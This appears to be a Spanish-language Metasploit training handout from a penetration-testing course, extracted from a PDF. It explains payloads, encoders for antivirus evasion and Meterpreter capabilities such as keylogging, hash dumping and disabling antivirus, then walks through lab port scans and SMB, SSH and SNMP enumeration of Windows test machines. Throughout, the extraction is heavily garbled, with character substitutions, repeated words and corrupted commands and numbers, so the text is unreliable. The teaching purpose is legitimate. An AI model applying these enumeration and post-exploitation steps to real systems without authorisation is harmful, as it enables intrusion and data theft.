Certified Offensive and Defensive Security Professional -CODSP Training

Certified Offensive and Defensive Security Professional -CODSP Training

(Profesional Certificado en Seguridad Ofensiva y Defensiva)

Taller de entrenamiento!

Penetration Testing con Metasploit Framework v " #

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Fundamentos y conceptos $%sicos %sicos de &'plotaci(n y el software Metasploit Seguramente muchas personas han escuchado hablar a un amigo, colega, un conferencista, un docente, entre otros, sobre los Framewor s de e!plotaci"n de vulnerabilidades, y en especial del famoso Framewor de e!plotaci"n llamado #etasploit, y muy seguramente ha entrado alg$n nivel de curiosidad en lo %ue respecta al funcionamiento, alcance e impacto %ue tiene este entorno de traba&o en la seguridad de la informaci"n ofensiva' (n efecto proyectos como #etasploit #etasploit han revolucionado la forma en %ue se reali.an las auditor)as, *est de Penetraci"n y+o pruebas de seguridad a los sistemas de informaci"n, ya %ue su potencia es tal, %ue personal t,cnico en el -rea de las tecnolog)as de la informaci"n sin e!periencia en seguridad de la informaci"n y+o usuarios mal intencionados pueden hacer uso de #etasploit para reali.ar pruebas de seguridad de una forma sencilla y causar seg$n el usuario, un buen dolor de cabe.a a los administradores de sistemas o por el contrario, presentar esentar importantes alertas de seguridad de forma anticipada, para corregir los agu&eros y debilidades de seguridad de un sistema inform-tico' Sin embargo software como #etasploit tiene m-s positivo %ue negativo, ya %ue tener un entorno de traba&o con e!ploits e!pl actuali.ados y listos para e&ecutarse, obligan a las empresas desarrolladoras de software a programar y publicar los parches para los agu&eros de seguridad %ue son aprovechados por los diferentes marcos de e!plotaci"n %ue e!isten en el mercado' Como es es el caso de #etasploit' /a potencia de #etasploit radica en tres tre conceptos fundamentales0 Facilidad de uso, multiplataforma y la comunidad' Facilidad de uso! desde el usuario ine!perto y novato en las pruebas de seguridad a sistemas de informaci"n, hasta a el usuario e!perto %ue tiene las capacidades de crear c"digos de e!plotaci"n, puede hacer uso de todo el potencial de #etasploit como parte esencial de las herramientas %ue usan para la reali.aci"n de las pruebas de seguridad a los sistemas inform-ticos' Multiplataforma0 Otra ra."n de peso para aprovechar todo el potencial de #etasploit, es %ue puede ser usado en diferentes sistemas operativos como /inu!, 1indows, 2ni!, entre otros, sin perder en ning$n momento la potencia del software #etasploit, independiente independiente del sistema operativo %ue usa el usuario final' )a comunidad! #etasploit fue liderado por un e!perto 3ac er llamado 3D #oore en el a4o 5667, sin embargo con el pasar de los a4os, muchos e!pertos en desarrollo de c"digos de e!plotaci"n se han sumado do a este gran proyecto, con lo %ue miles de programadores del mundo en la actualidad programan c"digos de e!plotaci"n de vulnerabilidades y los integran a #etasploit, ayudando as) a %ue la base de datos de e!ploit en #etasploit, sea de las m-s completas en n el mundo, y se mantenga bien actuali.ada' Para comen.ar de forma adecuada el estudio, an-lisis y pr-ctica con el software de e!plotaci"n #etasploit, es importante conocer la estructura de #etasploit y algunos conceptos base relacionados con la e!plotaci"n "n de vulnerabilidades'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Metasploit! (n su versi"n Framewor , #etasploit es un software de e!plotaci"n amparado como Software /ibre y c"digo abierto, inicialmente escrito en el lengua&e de programaci"n Perl, pero actualmente est- escrito en el lengua&e de e programaci"n 8uby' : la fecha fue ad%uirido por la potente empresa de seguridad llamada 8apid9, y recibe un gran n$mero de solicitud de descargas de forma anual' dispositiv *ulnera$ilidad! (s una debilidad %ue e!iste en un sistema operativo, aplicaci"n, dispositivos de red, protocolos de red, entre otros, la cual permite a un atacante o auditor de seguridad comprometer la seguridad del sistema o dispositivo de red' &'ploit0 (s un c"digo, m,todo o v)a, %ue permite a un atacante inform-tico o a un auditor de seguridad dad e!plotar una vulnerabilidad conocida, para poder comprometer la seguridad de un sistema inform-tico' : modo inform-tico, #etasploit cuenta con m-s de 966 c"digos de e!plotaci"n' Payload! (s un c"digo %ue acompa4a y se e&ecuta despu,s del c"digo de e!plotaci"n, e!p con el ob&etivo de poder realmente hacer algo en el sistema de la v)ctima, , por lo regular el c"digo Payload se usa para reali.ar una cone!i"n entre el atacante y la victima' :lgunos e&emplos de un Payload, seria la cone!i"n a la victima por medio de una Shell de comandos como cmd'e!e por e&emplo, o conectarse a la victima usando el protocolo ;<C' : modo inform-tico, #etasploit cuenta con m-s de 5=6 c"digos del tipo Payload' &ncoder! (s un componente de metasploit, el cual se usa para generar versiones versiones trasformadas de Payloads' #"dulos0 /os m"dulos son pe%ue4os componentes del sistema, donde cada modulo reali.a una tarea espec)fica, , la cual puede ser llamada en alg$n momento para integrarse a otros m"dulo, y poder hacer as) una tarea m-s representativa tativa de forma completa y compuesta por varios m"dulos' S+ellCode! (l shellcode se define como un con&unto de instrucciones %ue son utili.adas por un Payload cuando el proceso de e!plotaci"n se e&ecuta' Por lo regular en Shellcode est- escrito en lengua&e &e (nsamblador (:ssembly)' (n la mayor)a luego de %ue se e&ecute el c"digo Shellcode se recibe al usuario atacante y+o auditor de seguridad una Shell de comandos' )istener0 2n listener es un componente del software #etasploit, el cual %ueda a la espera de alg$n tipo de cone!i"n entrante' 2n e&emplo de un listener seria cuando una ma%uina victima ha sido comprometida y se ha de&ado alg$n tipo de puerta trasera o servicio e&ecut-ndose en la ma%uina v)ctima, y dicho servicio hace llamados de cone!i"n a la ma%uina ma% atacante de forma peri"dica para poder lograr de nuevo una intrusi"n en el e%uipo v)ctima' ,u'iliar -,u'iliary.! (s un modulo de #etasploit Framewor , el cual permite hacer tareas adicionales, para resolver problemas espec)ficos, tales como el scanning ng de puertos, ata%ues por fuer.a bruta, entre otros' ,r/uitectura de Metasploit0 /a ar%uitectura modular del software #etasploit, puede verse en la siguiente gr-fica'
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Fuente0 http0++www'offensive@security'com+metasploit@unleashed+#etasploitA:rchitecture http0++www'offensive unleashed+#etasploitA:rchitecture :nali.ando un poco el diagrama anterior, se tiene lo siguiente0 )i$raries -)i$rer0as.! /as diferentes librer)as son usadas de forma clave para el adecuado funcionamiento de #etasploit, ya %ue estas son una agrupaci"n de tareas definidas, operaciones y funciones %ue pueden ser usados por los diversos m"dulos %ue componen #etasploit' 2na de las /ibrer)asm-s importantes en el Framewor de e!plotaci"n e!plotaci #etasploit es la /ibrer)a 8e!, la cual es la base para la mayor)a de tareas, ya %ue dentro de esta librer)a se encuentran componentes de gran importancia como las implementaciones de los protocolos a nivel de servidor y cliente' /uego se tiene la /ibrer)a 1MSF Coreli$rary12 esta librer)a tiene como funciona principal la implementaci"n de todas las internases re%ueridas, las cuales permiten el traba&o de forma con&unta con los m"dulos de e!plotaci"n, las sesiones, entre otros' Finalmente se encuentra la a /ibrer)a 13ase li$rary12 la cual es la encargada de soportar el traba&o con los diferentes tipos de interfaces a nivel de usuario' >nterfaces0 (l entorno de traba&o de #etasploit, ofrece diferentes tipos de interfaces, cada una de ellas con sus fortale.as .as y debilidades' /as interfaces son las siguientes0 Msfconsole! (s una de la partes m-s populares y reconocidas de #etasploit Framewor , ya %ue es una herramienta del ?tipo todo en uno?, es una herramienta llena de funcionalidades, en la cual se puede hacer acer todo tipo de procesos en el Framewor , tales como la carga de m"dulos au!iliares, el scanning de una red, procesos de enumeraci"n, creaci"n de listeners y el lan.amiento de un e!ploit' (s una de las interfaces %ue mayor apoyo y soporte tiene con el entorno torno de traba&o de #etasploit' Para ingresar a la interface msfconsle, simplemente basta
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

con abrir una shell de comandos y digitar el comando msfconsole, tal y como se aprecia en la siguiente imagen'

/uego debe de abrirse la interface msfconsole, tal y como se aprecia en la siguiente imagen'

:l principio la interface puede parecer un poco comple&a, pero a medida %ue el usuario va conociendo los diferentes comandos, se podr- apreciar la facilidad de traba&o ba&o la interfaces msfconsole' Para usar la a ayuda dentro de la interface msfconsole, se debe de digitar el siguiente comando0 msfconsole -h

2n listado completo de los comandos soportados por la consola msfconsole, puede ser consultado en la siguiente 28/0 http0++www'offensive@security'com+metasploit security'com+metasploit@unleashed+#sfconsoleACommands unleashed+#sfconsoleACommands

Msfcli! (s una consola %ue se e&ecuta directamente desde la l)nea de comandos (Shell)' : diferencia de msfconsole, msfscli es una una consola m-s limitada, en la cual de igual forma se pueden lan.ar e!ploits, configurar m"dulos au!iliares, entre otros' : pesar de %ue su uso es limitado frente a msfconsole, msfcli es una interface de gran utilidad para e&ecutar tareas tales como0 probar r nuevos e!ploits, reali.ar e!plotaci"n espec)fica cuando el usuario conoce el
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

e!ploit y las opciones, automati.aci"n b-sica y con scripts, adem-s es adecuado para el aprendi.a&e de #etasploit (s importante tener presente %ue msfcli, solo puede mane&ar una shell o un hilo de cone!i"n a la ve.' (n la siguiente imagen se podr- ver un e&emplo de uso de msfcli'

Msfwe$! (s una consola web de f-cil uso, del tipo apunte y tire o ?Point@and@clic ?Point ?' 8elativamente ha sido considerada como una consola inestable y de poco uso' Para este modulo del di lomado en seguridad, no se har- uso de este tipo de interface' ,rmitage! (s una interface grafica a nivel de usuario, creada por 8aphael #udge, la cual posee muchas caracter)sticas y se integra con #etasploit de forma gratuita' Para este modulo el diplomado y+o taller de seguridad no se har- mucho ,nfasis en :rmitage, pero vale la pena %ue el estudiante luego profundice en esta interface, teniendo presente de forma anticipada el buen mane&o de la consola msfconsole, y %ue est, familiari.ado con #etasploit Framewor ' (n el siguiente lin se encuentra un interesante curso de puesta en marcha y pruebas con :rmitage' http0++www'ethicalhac er'net+content+view+79B+5+ (n la siguiente imagen se puede observar la interface :rmitage' :rmi

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

<ota0 Para los m"dulos de e!plotaci"n y post@e!plotaci"n post e!plotaci"n de este curso de seguridad, vamos a basarnos principalmente y en un gran porcenta&e en la interface msfconsole' u pueden Metasploit 4tilities -4tilidades 5mportantes de Metasploit.! /as siguientes utilidades sernos de mucha ayuda en situaciones espec)ficas %ue en alg$n momento se nos presenten al momento %ue estemos reali.ando nuestras auditor)as de sistemas, y tests de seguridad del tipo 3ac ing Ctico' MsfPayload! (s una utilidad de #etasploit #etasploit %ue le permite al usuario final tareas de gran importancia tales como0 Denerar c"digos del tipo shellcode, generar archivos e&ecutables, para pruebas de infecciones de virustroyanos por e&emplo' Con los las pr-cticas de laboratorio vistas en el transcurso curso de este diplomado, veremos %ue la utilidad msfpayload es de gran ayuda para los procesos de e!plotaci"n del lado cliente (ClientSide)' Msf&ncode! /os c"digos del tipo EShell codeI generados pro msfpayload son totalmente funcionales, sin embargo muchos muchos de estos c"digos contienen caracteres nulos, los cuales al ser interpretados por muchos programas, pueden causar %ue el c"digo no se e&ecute de forma completa' :dem-s de %ue los Shellcode generados muy probablemente lleguen a la victima pasando por redes es %ue est,n siendo vigiladas y protegidas por sistemas detectores de intrusos y software antivirus' Por todas las ra.ones e!puestas anteriormente los desarrolladores de #etasploit crearon #sfencode, el cual es una utilidad %ue ayuda a evitar %ue el shellcode shel preparada por el auditor inform-tico y+o Pentester, sea indetectable y no contenga caracteres %ue afecten la e&ecuci"n del c"digo antes de tiempo' #etasploit contiene diferentes encoders (Codificador) para diversas situaciones' Para identificar la lista lista de opciones de la utilidad msfencode, se debe de digitar el comando %ue se aprecia en la siguiente imagen0

2no de los encoders m-s fiables %ue contiene #estaploit, es el encoder!FG+shi ataAgaAnai, el cual est- clasificado como (!celente ((!cellent)' Para ver un listado de los encoders disponibles, digitar el siguiente comando desde la Shell de /inu! Hac trac 0 msfencode -l

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Clasificaci"n de los (!ploit y los Payloads en #etasploit Framewor 0 Clasificaci(n de los &'ploit! /os c"digos de e!plotaci"n e!plotaci"n ((!ploits) en #etasploit se dividen en dos0 (!ploit :ctivos y (!ploits Pasivos &'ploit ,ctivos! Son c"digos de e!plotaci"n %ue se e&ecuten en la ma%uina victima de forma completa, incluyendo la finali.aci"n del c"digo' :lgunos e&emplos de e!ploits activos act son0 ms6FA6G9Anetapi smb+pse!ec &'ploit Pasivos! Son c"digos de e!plotaci"n %ue esperan a %ue las victimas se conecten a ellos' Por lo regular son los c"digos e!ploits %ue est-n del lado del cliente (ClienSide)' Clasificaci(n de Payloads! /os c"digos c"digos del tipo Payload (Carga Jtil) en #etasploit dividen en tres0 Singles, Stagers, y Stages'Cada uno de ellos posee una gran variedad y pueden aplicarse a diferentes escenarios' Singles! Son tipos de Payloads %ue son aut"nomos e independientes, y se ven representados rep en acciones como crear un usuario o abrir la calculadora (calc'e!e) en el sistema v)ctima' Stagers! Son tipos de Payloads dise4ados de un modo pe%ue4o y fiables y permiten configurar una cone!i"n de red entre la v)ctima y el atacante' Stages! Son tipos de Payloads un poco m-s pesados, y permiten descargar y hacer procesos en el sistema v)ctima tales como >nyecci"n ;<C, #eterpreter, entre otros' Meterpreter -Meta- 5nterpreter. E*odo en 2noI K (l Payload 8ey'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Como se ver- a lo largo de este curso curso de seguridad, #etasploit Framewor tiene muchos Payloads, pero meterpreter es uno de los %ue m-s funcionalidades tiene' ' #eterpreter se define como una e!tensi"n de #etasploit, la cual permite aprovechar al m-!imo las funcionalidades de #etasploit y aumentar aumentar el alcance en lo %ue respecta a comprometer a nuestra ma%uina v)ctima' ' *ambi,n puede definirse como un Payload avan.ado' Dentro de muchas de las funcionalidades y caracter)sticas %ue nos ofrece #eterpreter se encuentran0 Cargar 2n Leylogger(#"dulo Leylogger(#"dulo %ue graba las pulsaciones en el teclado) en el sistema victima /a comunicaci"n entre el atacante (:uditor) victima (ob&etivo de evaluaci"n) es cifrada 3acer capturas de pantalla(Screenshot) en el sistema victima Subir y descargar archivos entre el sistema siste v)ctima y el atacante y+o auditor' :pagar el sistema victima #anipular el registro de 1indows en el sistema victima (:cceso /ectura+(scritura) :brir una Shell de comandos en el sistema victima #igrar de procesos en el sistema victima Obtener los 3ash de e los usuarios del sistema victima Pivoting entre subredes en el sistema y+o red victima (vita la creaci"n de procesos en el sistema victima (vita la creaci"n de archivos en el disco duro del sistema victima (s una herramienta %ue sirve tanto en el proceso de e!plotaci"n, como en el de post@ post e!plotaci"n' Se pueden usar m$ltiples canales de comunicaci"n entre la v)ctima y el atacante (:uditor) usando la misma cone!i"n' :cceso al sistema de archivos en el sistema victima (&ecuci"n de comandos en el sistema victima vic Obtener informaci"n del sistema victima (s un Payload estable y altamente fle!ible Deshabilitar el software antivirus Capturar trafico de red en el sistema victima M #ucho masNNNNNNNN

(n la siguiente imagen podemos apreciar una Shell #eterpreter %ue se le ha dado al usuario atacante y+o auditor de seguridad, luego de %ue este ha reali.ado una intrusi"n e!itosa sobre un sistema vulnerable con S'O 1indows OP'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Para usar la ayuda de meterpreter, basta con digitar el comando help directamente desde des la consola meterpreter' : medida %ue avan.a el curso de seguridad, veremos c"mo utili.ar #eterpreter en los procesos de auditor)as de seguridad y teste de penetraci"n' #eterpreter ser- una de las herramientas %ue m-s se usa en los procesos de e!plotaci"n e!plotaci"n de este curso de seguridad inform-tica' Otros Payloads importantes %ue se deben mane&ar y conocer dentro del entorno de traba&o de #etasploit Framewor 0 windows6vncin7ect6reverse8tcp windows6s+ell6reverse8tcp windows6s+ell8$ind8tcp &'plotaci(n $%sica con Metasploit Framework0 Para proceder a reali.ar el primer proceso de e!plotaci"n usando metasploit Framewor , se hace necesario tener presente los siguientes conceptos y criterios0 /a e!plotaci"n y la post@e!plotaci"n post e!plotaci"n son las $ltimas fases de proceso de auditor)a de seguridad ,tica (3ac ing ,tico) y+o *est de penetraci"n, por lo %ue antes de proceder al lan.ar el primer proceso de e!plotaci"n con #etasploit, el estudiante debe de mane&ar de forma completa las anteriores fases del 3ac ing Ctico tales como0 co 8ecolecci"n de informaci"n, Scanning de puertos, (numeraci"n y Scanning de vulnerabilidades' (l proceso de e!plotaci"n, se basa en una debilidad cr)tica identificada en las fases anteriores del 3ac ing Ctico' /a mayor)a de procesos de e!plotaci"n se reali.an usando la consola msfconsole, sin embargo haremos uso en algunos procesos de e!plotaci"n de la consola msfcli' Para lan.ar el primer e!ploit usando #etasploit Framewor , se deben de tener en cuenta los conceptos %ue se mencionan a continuaci"n, en en lo %ue respecta a e!plotaci"n b-sica' *ener en cuenta y como referencia los comandos de msfconsole, los cuales se pueden encontrar de forma completa en la siguiente 2rl0 http0++www'offensive@ http0++www'offensive security'com+metasploit security'com+metasploit@unleashed+#sfconsoleACommands

Conceptos de e!plotaci"n b-sica con #etasploit Framewor 0 teniendo presente %ue metasploit contiene much)simos m"dulos, e!ploit, au!iliares, payloads, entre otros, se dificulta dific un poco recordar cada uno de los m"dulos, por lo tanto es importante conocer y practicar sobre los siguientes comandos de la consola msfconsole, para facilitar as) el uso de cada uno de los componentes %ue re%ueridos para los procesos de e!plotaci"n0
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

msf> show exploits: (ste comando muestra todos los c"digos de e!plotaci"n %ue est-n disponibles en metasploit Framewor (/a cantidad de e!ploits depende de la fecha de actuali.aci"n de metasploit)' (l anterior comando es de gran importancia, ya %ue cada d)a d se descubren nuevas vulnerabilidades, y por consenciente se crean e integran nuevos c"digos de e!plotaci"n a metasploit framewor ' (n la siguiente imagen se puede apreciar un e&emplo de la e&ecuci"n de este comando'

msf9 s+ow au'iliary! /os m"dulos au!iliares en metasploit, tienen variedad de prop"sitos, tales como0 Scanners de red, Scanners de servicios, fu..ers, entre otros' Por lo tanto la e&ecuci"n del comando en menci"n muestra en pantalla los m"dulos au!iliares disponibles para metasploit framewor wor ' (/a cantidad de m"dulos au!iliares depende de la fecha de actuali.aci"n de metasploit)

Pr%cticas de )a$oratorio!
Pr%ctica de la$oratorio numero "
O$7etivos0 >ngresar y hacer uso de las diferentes consolas %ue ofrece #etasploit, tales como la msfconsole y la msfcli :ecursos0 ;#1:8(, #etasploit Framewor y Hac trac =

&7ecuci(n de la pr%ctica de la$oratorio "! Paso "0 >ngresar a /inu! Hac trac , y abrir una shell de comandos (*erminal)' -:ecordar /ue el usuario y pass/ord respectivamente para para 3acktrack2 es root y toor )uego desde la s+ell de comandos digitar startx para entrar al modo grafico.

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso 50 abrir la consola msfconsole, lo cual se logra digitando el comando msfconsole desde la terminal de comandos de /inu! Hac trac

/uego %ue se digite el comando msfconsole, debe de salir lo siguiente0

(n la anterior imagen se puede apreciar %ue ya estamos dentro de la interface msfconsole' (n el ingreso a la interface, el sistema nos indica la versi"n de metasploit, el n$mero de e!ploits, e!ploi el n$mero de m"dulos au!iliares, el n$mero de P:M/O:DS, entre otros' ,notaci(n! Para ingresar a la interface msfconsole, y a las otras interfaces %ue nos ofrece metasploit, tambi,n lo podemos hacer por el entorno grafico'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso 70 digitar el comando msfconsole -h, para poder ver la ayuda de la interface msfconsole

Paso P0 salir de la interface msfconsole con el comando e!it' Paso =0 2na ve. %ue se tiene una visi"n general sobre algunas de las interfaces de metasploit, es importante tener presente presen %ue el software debe de %uedar actuali.ado a los $ltimos e!ploits, payloads, m"dulos au!iliares, entre otros' Para actuali.ar metasploit, simplemente desde una shell de msfconsole, digitamos el comando msfupdate.

O tambi,n puede hacerse de la interface interface grafica, tal y como se muestra en la siguiente imagen'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

,notaci(n0 Para efectos de este taller, ya se entrega /inu! Hac trac con #etasploit actuali.ado al d)a' /o anterior para fines de optimi.ar tiempos, ya %ue actuali.ar metasploit en el e%uipo e cada estudiante, puede tomar alg$n tiempo, seg$n la velocidad del canal de >nternet en donde se dicta el taller' (s altamente importante, %ue cuando actualicen metasploit en sus casas, configuren el blo%ueador de scripts de firefo! en sitio https0++metasploit'com, https0++metasploit'com, como un sitio seguro, para %ue no presenten problemas al momento de actuali.ar metasploit'

Pr%ctica de la$oratorio numero ;

O$7etivos0 ;erificar la cone!i"n de #etasploit con un sistema de bases de daos, para ir almacenando la informaci"n de los host %ue se est-n evaluando a nivel de seguridad, en lo %ue respecta a procesos de scanning de puertos'
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

:ecursos0 ;#1:8(, #etasploit Framewor , 1indows Server y Hac trac = O$servaciones! :ntes de proceder a reali.ar la pr-ctica, verificar %ue las ma%uinas /inu! Hac trac y 1indows 5667 Server est-n conectados en el mismo segmento de red, y %ue hay ping entre ambas ma%uinas' (s altamente importante tener conocimientos b-sicos@medios b-sicos medios al respecto de los servicios de red %ue se est-n evaluando y pr"!imamente pr"!imamente atacando, para comprender me&or el traba&o de an-lisis de seguridad y+o penetration testing reali.ado'

&7ecuci(n de la pr%ctica de la$oratorio ;! Cone'i(n con una $ase de datos y Scanning de Puertos Paso "0 >ngresar a la interface msfconsole ,notaci(n! (n versiones anteriores de metasploit se hac)a necesario configurar metasploit con una base de datos para poder plasmar de una manera m-s ordenada los resultados de las actividades %ue se iban e&ecutando en el proceso de pruebas de penetraci"n' penetraci"n' :ctualmente la $ltima versi"n de metasploit solo soporta cone!i"n para base PostgreSQ/' Para poder ver el status de cone!i"n de metasploit con la base de datos PostgreSQ/ se debe de digitar el siguiente comando0 db_status

Paso ;0 digitar el comando db_status, para identificar %ue metasploit est, conectado a una base de datos llamada msf7dev dev Paso <0 digitar el comando dbAnmap direcci"n >P *arget (1indows Server 5667)

Paso =0 digitar el comando hosts para ver los resultados de los host %ue se tienen guardados en la base de datos' Para el siguiente caso, se tienen dos host'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

:notaci"n0 (n ocasiones cuando el e%uipo de traba&o de un proceso de auditor)a de seguridad y+o penetration testing es representativo, y se hacen pruebas en diferentes momentos y de lugares distintos, , es importante e&ecutar nmap de firma directa y guardar los resultados en un archivo con alg$n formato en especial, por e&emplo en O#/' Paso >0 reali.ar un scanning de puertos usando nmap, con la opci"n de e!portar los resultados resul del scanning a un archivo del tipo O#/' (l scanning de puertos se puede hacer a un solo host, o directamente a toda una subred' Para el caso hacerlo sobre la ma%uina 1indows 5667 Server'

/os resultados del anterior proceso de scanning, deber)an de ser importados a la base de datos de metasploit' Paso ?0 2na ve. %ue se tienen algunos host registrados en la base de datos, con el comando services, se pueden identificar los servicios %ue est-n a la escucha en las ma%uinas victimas'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso @0 reali.ar .ar un proceso de Scanning de puertos usando los modulos au!iliares de nmap %ue est-n dentro de metasploit' Para lograrlo primero debemos de hacer una na b$s%ueda con el comando search de los m"dulos au!iliares de metasploit %ue tiene la funci"n de scanning de puertos, lo cual e logra con el siguiente comando0 search portscan

/uego se obtiene los siguientes resultados0

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso A0 Seleccionar el modulo au!iliar de scanning llamado au'iliary6scanner6portscan6syn y seleccionarlo con el comando use de metasploit, tal y como se muestra en el siguiente comando0 use auxiliary/scanner/portscan/syn

Dar el comando show options para ver las variables %ue necesita el modulo para poder traba&ar'

Paso B0 >ndicar las variables %ue se necesita para reali.ar el scanning scanning de puertos, para el caso solo vamos a asignar valores a la variable 83OS* %ue es la ma%uina target@victima, target victima, a la cual el vamos a reali.ar el scanning de puertos, y vamos a asignarle valores a la variable PO8*S, %ue corresponde a los puertos *CP %ue vamos a verificar si est-n abiertos, cerrados o filtrados' Seg$n lo anterior los comandos para asignar los valores para ambas variables son0 set RH !" #$ de %indows !erver set $ R"! &','(,)*,++*,+(',+(,,--',+-((,((), Paso B0 (l $ltimo paso es digitar el e comando show options para ver %ue todo est- bien, y si no hay problemas, , entonces de procede a e&ecutar el modulo :u!iliar de scanning de puertos con el comando run

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

2na ve. %ue se e&ecute el modulo au!iliar contra uno de e los targets (Ob&etivos de evaluaci"n), debe de salir los siguientes resultados (8ecordar %ue las direcciones >P var)an de acuerdo a cada target de cada segmento de red de las ma%uinas virtuales)

5r m%s all%! Para usuarios m-s avan.ados y+o e!perimentados con metasploit, %ue tal si e&ecutan el anterior comando, pero colocando un sniffer como wireshar de forma paralela al scanning de puertos, para capturar el tr-fico y verificar el tr-fico de red para un scanning de puertos del tipo SM<'

Pr%ctica de la$oratorio numero <

O$7etivos0 >dentificar y utili.ar algunos de los m"dulos au!iliares %ue tiene #etasploit # para reali.ar procesos de scanning de puertos para aplicaciones y+o protocolos espec)ficos, espec)ficos tanto a nivel *CP como para 2DP' :ecursos! ;#1:8(, #etasploit Framewor , 1indows Server 5667, , 1indows OP y Hac trac = O$servaciones! :ntes de proceder a reali.ar la pr-ctica, verificar %ue las ma%uinas /inu! Hac trac y 1indows 5667 Server est-n conectados en el mismo segmento de red, y %ue hay ping entre ambas ma%uinas' (s altamente te importante tener conocimientos b-sicos@medios medios al respecto de los servicios de red %ue se est-n evaluando y pr"!imamente atacando, para comprender me&or el traba&o de an-lisis de seguridad y+o penetration testing reali.ado'

&7ecuci(n de la pr%ctica de la$oratorio <! Paso "! *raba&ando con el Protocolo S#H0 8eali.ar un proceso de scanning del servicio S#H (Server #essage Hloc Scanning), para lo cual se debe de seleccionar el modulo au!iliar au'iliary6scanner6sm$6sm$8version' Para poder usar este modulo, o, se debe reali.ar de forma secuencial lo siguiente0
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

seleccionar el modulo au!iliar con el comando use auxiliary/scanner/smb/smb_version /uego se debe de digitar el comando show options, para ver las opciones del modulo au!iliar /uego se le coloca la variable variable 83OS*S, %ue para el caso de este laboratorio, seria para asignar la direcci"n >P de 1indows 5667 Server' De nuevo digitamos show options y si todo est- bien, e&ecutamos el m"dulos au!iliar con el comando exploit. (n la siguiente imagen encuentras de forma secuencial todos los pasos mencionados anteriormente'

Si el e'ploit se e&ecuta correctamente, deber- de mostrar algo similar a la siguiente imagen, donde se puede apreciar el sistema operativo del target (;ictima @ob&etivo de an-lisis de seguridad), d), el dominio al %ue est- asociado la v)ctima, , y el nombre del servidor

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso ;! *raba&ando con el Protocolo S#H0 8eali.ar un proceso de enumeraci"n de usuarios y grupos del nuestra v)ctima o target, %ue para el caso es 1indows 5667 Server, Serve lo cual se logra usando el modulo auxiliar auxiliary/scanner/smb/smb_loo.upsid' Para poder usar este modulo, se debe reali.ar de forma secuencial lo siguiente0 use auxiliary/scanner/smb/smb_loo.upsid show options set RH !"! #$ %indows !erver exploit (n la siguiente nte imagen encuentras de forma secuencial todos los pasos mencionados anteriormente'

Si el modulo au!iliar se e&ecuta de forma correcta, deberemos tener los nombres de usuarios y grupos %ue e!isten actualmente en el servidor 1indows 5667 Server'

www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

Paso <! *raba&ando con el Protocolo SS30 8eali.ar un proceso de identificaci"n de la versi"n del servidor SS3 %ue se encuentra en el e%uipo 1indows OP SP5' SP5 /o anterior se logra seleccionando el modulo au!iliar de metasploit llamado au!iliary+scanner+ssh+sshAversion au!iliary+scanner+ssh+ssh Para poder usar este modulo, se debe reali.ar de forma secuencial lo siguiente0 use auxiliary/scanner/ssh/ssh_version show options set RH !"! #$ %indows /$ !$& exploit (n la siguiente imagen encuentras de forma secuencial todos los pasos mencionados mencio anteriormente'

Paso =! *raba&ando con el Protocolo S<#P0 8eali.ar un proceso de identificaci"n de recursos %ue se tengan compartidos en la estaci"n de traba&o 1indows OP SP5, usando el protocolo simple de administraci"n de red' /o anterior se logra logra seleccionando el modulo au!iliar de metasploit llamado use au!iliary+scanner+snmp+snmpAenumshares use au!iliary+scanner+snmp+snmpAenumshares show options set 83OS*S RB5'RGF'R79'5F run
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

(n la siguiente imagen encuentras de forma secuencial todos los pasos mencionados anteriormente'

,notaci(n! M de forma similar e!isten much)simos m-s m"dulos au!iliares a nivel de scanners de puertos y aplicaciones, los cuales eval$an otros protocolos tales como F*P, #SSQ/, S<#P, entre otros'

Pr%ctica de la$oratorio numero =

O$7etivos0 >dentificar y utili.ar algunos de los m"dulos au!iliares %ue tiene #etasploit para reali.ar procesos de an-lisis de vulnerabilidades para aplicaciones y+o protocolos espec)ficos, tanto a nivel *CP como para 2DP' 2 :ecursos! ;#1:8(, #etasploit Framewor , 1indows Server 5667, 1indows OP y Hac trac = O$servaciones! :ntes de proceder a reali.ar la pr-ctica, verificar %ue las ma%uinas /inu! Hac trac y 1indows 5667 Server est-n conectados en el mismo segmento de de red, y %ue hay ping entre ambas ma%uinas' (s altamente importante tener conocimientos b-sicos@medios b-sicos medios al respecto de los
www dsteamseguridad com

Certified Offensive and Defensive Security Professional -CODSP Training

servicios de red %ue se est-n evaluando y pr"!imamente atacando, para comprender me&or el traba&o de an-lisis de seguridad y+o penetration penetration testing reali.ado' Como actividad complementaria y para evitar todo el tiempo %ue la aplicaci"n nessus se demora actuali.ando los plug@in, plug in, se puede usar el software nessus %ue esta instalado en la ma%uina 1indows OP

